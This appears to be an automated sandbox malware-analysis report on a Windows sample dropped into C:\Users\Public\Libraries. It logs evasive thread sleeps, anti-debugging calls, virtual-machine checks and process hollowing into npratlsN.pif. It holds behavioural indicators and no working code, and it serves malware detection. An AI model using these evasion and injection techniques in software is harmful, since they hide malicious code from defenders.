Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -593364s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -593239s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -593114s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -592989s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -592849s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -592679s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -592567s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -592443s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -592318s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -592193s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -592068s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -591943s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -591818s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -591693s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -591568s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -591443s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -591318s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 648	Thread sleep time: -591193s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep count: 32 > 30
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8100	Thread sleep count: 1935 > 30
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -599890s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -599781s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 8100	Thread sleep count: 7919 > 30
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -599672s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -599562s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -599453s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -599343s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -599234s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -599125s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -599015s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -598906s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -598796s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -598687s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -598578s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -598467s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -598359s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -598250s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -598140s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -598031s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -597922s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -597812s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -597703s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -597593s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -597484s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -597375s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -597265s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -597156s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -597047s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -596937s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -596828s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -596718s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -596609s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -596499s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -596390s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -596281s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -596172s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -596062s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -595953s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -595842s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -595734s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -595625s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -595515s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -595406s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -595296s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -595187s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -595078s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -594956s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -594828s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -594718s >= -30000s
Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7416	Thread sleep time: -594609s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 4_2_028F5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_028F5908

Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598905	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598137	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596145	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595928	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595139	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594588	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594477	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594369	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599734
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599625
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599516
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599407
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599282
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599172
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599063
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598938
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598813
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598688
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598563
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598453
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598344
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598219
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598110
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597985
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597860
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597735
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597594
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597466
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597354
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597244
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597135
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597022
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596860
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596750
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596639
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596494
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596321
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596178
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596032
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595859
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595730
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595571
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595374
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594932
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594741
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594609
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594437
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594254
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594059
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593755
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593611
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593489
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593364
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593239
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 593114
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592989
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592849
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592679
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592567
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592443
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592318
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592193
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 592068
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591943
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591818
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591693
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591568
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591443
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591318
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 591193
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599890
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599672
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599343
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599125
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 599015
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598906
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598796
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598687
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598578
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598467
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598359
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598250
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598140
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 598031
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597922
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597812
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597703
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597593
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597484
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597375
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597265
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597156
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 597047
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596937
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596828
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596718
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596609
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596499
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596390
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596281
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596172
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 596062
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595953
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595842
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595734
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595625
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595515
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595406
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595296
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595187
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 595078
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594956
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594828
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594718
Source: C:\Users\Public\Libraries\npratlsN.pif	Thread delayed: delay time: 594609

Source: Nsltarpn.PIF, 0000000F.00000002.2055769100.00000000006B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: Nsltarpn.PIF, 0000000D.00000002.1975967532.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
Source: brightness.exe, 00000004.00000002.1860229176.0000000000656000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWt
Source: brightness.exe, 00000004.00000002.1860229176.000000000063D000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1860229176.0000000000656000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: npratlsN.pif, 0000000A.00000002.3461578929.0000000029AFE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3454668828.000000001F984000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029E9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\brightness.exe	API call chain: ExitProcess graph end node	graph_4-33786
Source: C:\Users\Public\Libraries\npratlsN.pif	API call chain: ExitProcess graph end node	graph_10-83020
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\npratlsN.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	API call chain: ExitProcess graph end node

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 4_2_0290FA38 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

4_2_0290FA38

Source: C:\Windows\SysWOW64\brightness.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process queried: DebugPort

Source: C:\Users\Public\Libraries\npratlsN.pif

Code function: 10_2_2F687808 LdrInitializeThunk,

10_2_2F687808

Source: C:\Users\Public\Libraries\npratlsN.pif

Code function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

10_2_0040CE09

Source: C:\Users\Public\Libraries\npratlsN.pif

10_2_004019F0

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 4_2_02908818 LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02908818

Source: C:\Users\Public\Libraries\npratlsN.pif

Code function: 10_2_0040ADB0 GetProcessHeap,HeapFree,

10_2_0040ADB0

Source: C:\Users\Public\Libraries\npratlsN.pif

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_0040CE09
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_0040E61C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00416F6A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_004123F1 SetUnhandledExceptionFilter,	10_2_004123F1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_0040CE09
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_0040E61C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00416F6A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_2_004123F1 SetUnhandledExceptionFilter,	14_2_004123F1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_1_0040CE09
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_1_0040E61C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_1_00416F6A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 14_1_004123F1 SetUnhandledExceptionFilter,	14_1_004123F1

Source: C:\Users\Public\Libraries\npratlsN.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\brightness.exe	Memory allocated: C:\Users\Public\Libraries\npratlsN.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Memory allocated: C:\Users\Public\Libraries\npratlsN.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Memory allocated: C:\Users\Public\Libraries\npratlsN.pif base: 400000 protect: page execute and read and write

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\brightness.exe	Section unmapped: C:\Users\Public\Libraries\npratlsN.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section unmapped: C:\Users\Public\Libraries\npratlsN.pif base address: 400000
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section unmapped: C:\Users\Public\Libraries\npratlsN.pif base address: 400000

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\brightness.exe	Memory written: C:\Users\Public\Libraries\npratlsN.pif base: 331008	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Memory written: C:\Users\Public\Libraries\npratlsN.pif base: 329008
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Memory written: C:\Users\Public\Libraries\npratlsN.pif base: 217008

Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif

Source: C:\Windows\SysWOW64\brightness.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_028F5ACC
